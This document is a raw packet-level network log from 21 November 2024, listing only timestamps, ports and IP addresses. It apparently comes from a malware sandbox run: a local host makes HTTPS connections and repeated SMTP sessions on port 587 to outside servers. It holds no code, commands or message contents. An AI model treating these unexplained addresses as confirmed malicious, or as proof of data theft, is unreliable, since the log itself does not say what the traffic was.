Nov 21, 2024 17:00:18.558444023 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.558525085 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.558556080 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.558607101 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.565035105 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.565061092 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.565114975 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.565124035 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.565165043 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.572781086 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.572802067 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.572874069 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.572882891 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.572922945 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.580584049 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.580610037 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.580693960 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.580704927 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.580746889 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.587450981 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.587471008 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.587557077 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.587564945 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.587622881 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.595635891 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.595659971 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.595735073 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.595743895 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.595792055 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.602467060 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.602484941 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.602559090 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.602566957 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.602611065 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.611874104 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.611898899 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.611989021 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.611996889 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.612039089 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.649851084 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.649965048 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.649971962 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.650028944 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.650727987 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.650743008 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:18.650758028 CET	49713	443	192.168.2.10	198.252.105.91
Nov 21, 2024 17:00:18.650765896 CET	443	49713	198.252.105.91	192.168.2.10
Nov 21, 2024 17:00:24.746854067 CET	49742	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:24.746906042 CET	443	49742	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:24.747189045 CET	49742	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:24.758080006 CET	49742	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:24.758097887 CET	443	49742	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:26.020345926 CET	443	49742	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:26.020420074 CET	49742	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:26.023756027 CET	49742	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:26.023762941 CET	443	49742	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:26.024038076 CET	443	49742	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:26.127334118 CET	49742	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:26.175335884 CET	443	49742	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:26.497208118 CET	443	49742	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:26.497272968 CET	443	49742	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:26.497400045 CET	49742	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:26.503134012 CET	49742	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:28.334718943 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:28.456048012 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:28.459206104 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:29.846848965 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:29.847146034 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:29.966789961 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:30.271219969 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:30.271703959 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:30.398055077 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:30.701157093 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:30.704874992 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:30.826977015 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:31.139983892 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:31.140011072 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:31.140018940 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:31.140145063 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:31.236249924 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:31.356744051 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:31.659904957 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:31.662585020 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:31.782144070 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:32.125724077 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:32.126759052 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:32.302745104 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:32.550801039 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:32.552337885 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:32.671812057 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:32.985346079 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:32.985707998 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:33.105592012 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:33.425224066 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:33.434154987 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:33.553752899 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:33.860318899 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:33.860536098 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:33.987782955 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:34.298571110 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:34.307439089 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:34.307486057 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:34.307486057 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:34.307662010 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:34.431996107 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:34.432008028 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:34.432018042 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:34.432023048 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:34.827924013 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:35.011133909 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:35.298523903 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:35.419909000 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:35.723855019 CET	587	49749	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:35.724484921 CET	49749	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:35.725620031 CET	49769	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:35.845230103 CET	587	49769	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:35.845454931 CET	49769	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:36.560545921 CET	49775	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:36.560584068 CET	443	49775	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:36.560671091 CET	49775	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:36.565469980 CET	49775	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:36.565485001 CET	443	49775	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:37.870102882 CET	443	49775	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:37.870181084 CET	49775	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:37.871717930 CET	49775	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:37.871728897 CET	443	49775	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:37.871968031 CET	443	49775	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:37.913167953 CET	49775	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:37.939877033 CET	49775	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:37.987323999 CET	443	49775	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:38.357696056 CET	443	49775	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:38.357770920 CET	443	49775	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:38.357826948 CET	49775	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:38.360275030 CET	49775	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:39.729950905 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:39.851341009 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:39.851475954 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:41.179049969 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:41.179328918 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:41.302793980 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:41.592478991 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:41.592700958 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:41.715435982 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:42.005294085 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:42.005811930 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:42.126499891 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:42.421252966 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:42.421334982 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:42.421345949 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:42.421353102 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:42.421462059 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:42.421462059 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:42.427656889 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:42.551362991 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:42.840251923 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:42.859692097 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:42.979720116 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:43.268691063 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:43.404165983 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:43.434166908 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:43.553881884 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:43.843197107 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:43.843507051 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:43.963259935 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:44.264003038 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:44.264496088 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:44.388683081 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:44.677639961 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:44.677974939 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:44.798079014 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:45.091017962 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:45.091213942 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:45.210822105 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:45.502697945 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:45.503426075 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:45.503499985 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:45.503499985 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:45.511929989 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:45.625792980 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:45.625802994 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:45.625936031 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:45.633786917 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:46.002197027 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:46.113145113 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:46.697247982 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:46.734519958 CET	49797	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:46.734560966 CET	443	49797	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:46.734704018 CET	49797	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:46.738302946 CET	49797	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:46.738315105 CET	443	49797	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:46.909533024 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:47.129017115 CET	587	49781	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:47.129456043 CET	49781	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:47.130464077 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:47.252557993 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:47.252633095 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:48.063752890 CET	443	49797	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:48.063838005 CET	49797	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:48.067584991 CET	49797	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:48.067593098 CET	443	49797	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:48.067848921 CET	443	49797	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:48.252391100 CET	49797	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:48.273468971 CET	49797	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:48.319349051 CET	443	49797	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:48.580899000 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:48.581091881 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:48.619659901 CET	443	49797	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:48.619734049 CET	443	49797	104.26.13.205	192.168.2.10
Nov 21, 2024 17:00:48.619813919 CET	49797	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:48.622843027 CET	49797	443	192.168.2.10	104.26.13.205
Nov 21, 2024 17:00:48.700704098 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:48.993161917 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:48.993350983 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:49.113675117 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:49.443989992 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:49.444509983 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:49.566387892 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:49.865031958 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:49.865101099 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:49.865137100 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:49.865150928 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:49.866871119 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:49.990427017 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:50.027822971 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:50.148674011 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:50.148751974 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:50.282696009 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:50.283646107 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:50.408456087 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:50.700634956 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:50.700871944 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:50.821527004 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:51.125626087 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:51.126279116 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:51.248155117 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:51.408502102 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:51.408782959 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:51.529421091 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:51.543011904 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:51.543350935 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:51.665319920 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:51.821098089 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:51.821510077 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:51.945868015 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:51.957565069 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:51.963176966 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:52.082801104 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.238437891 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.244585991 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:52.367610931 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.378737926 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.397651911 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:52.517795086 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.664669037 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.664741993 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.664781094 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.664793968 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:52.670248032 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:52.789993048 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.811283112 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.812589884 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:52.812661886 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:52.812689066 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:52.812728882 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:52.812764883 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:52.812794924 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:52.812824965 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:52.812850952 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:52.812869072 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:52.812879086 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:52.933921099 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.933958054 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.934052944 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.934127092 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.934182882 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.934214115 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.934261084 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.934289932 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.934341908 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:52.934387922 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:53.082696915 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:53.090039015 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:53.211019039 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:53.228091002 CET	587	49798	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:53.407071114 CET	49798	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:53.502832890 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:53.503222942 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:53.624710083 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:53.916323900 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:53.916927099 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:54.202019930 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:54.503716946 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:54.504072905 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:54.763665915 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:55.057270050 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:55.057475090 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:55.178364038 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:55.474190950 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:55.474471092 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:55.649862051 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:55.941884041 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:55.942491055 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:55.942567110 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:55.942733049 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:55.942733049 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:56.077311993 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:56.077338934 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:56.077348948 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:56.077358961 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:56.459923983 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:56.500874043 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:56.504075050 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:56.623600960 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:56.915060997 CET	587	49804	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:56.915455103 CET	49804	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:56.916373014 CET	49819	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:57.036107063 CET	587	49819	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:57.036267996 CET	49819	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:58.304411888 CET	587	49819	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:58.304702997 CET	49819	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:58.454374075 CET	587	49819	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:58.749177933 CET	587	49819	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:58.749380112 CET	49819	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:58.873159885 CET	587	49819	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:59.170792103 CET	587	49819	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:59.171247959 CET	49819	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:59.291136980 CET	587	49819	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:59.591083050 CET	587	49819	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:59.591130018 CET	587	49819	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:59.591285944 CET	587	49819	51.195.88.199	192.168.2.10
Nov 21, 2024 17:00:59.591330051 CET	49819	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:59.592607021 CET	49819	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:00:59.722196102 CET	587	49819	51.195.88.199	192.168.2.10
Nov 21, 2024 17:01:00.016329050 CET	587	49819	51.195.88.199	192.168.2.10
Nov 21, 2024 17:01:00.017615080 CET	49819	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:01:00.137181044 CET	587	49819	51.195.88.199	192.168.2.10
Nov 21, 2024 17:01:00.432310104 CET	587	49819	51.195.88.199	192.168.2.10
Nov 21, 2024 17:01:00.432882071 CET	49819	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:01:00.553785086 CET	587	49819	51.195.88.199	192.168.2.10
Nov 21, 2024 17:01:00.850081921 CET	587	49819	51.195.88.199	192.168.2.10
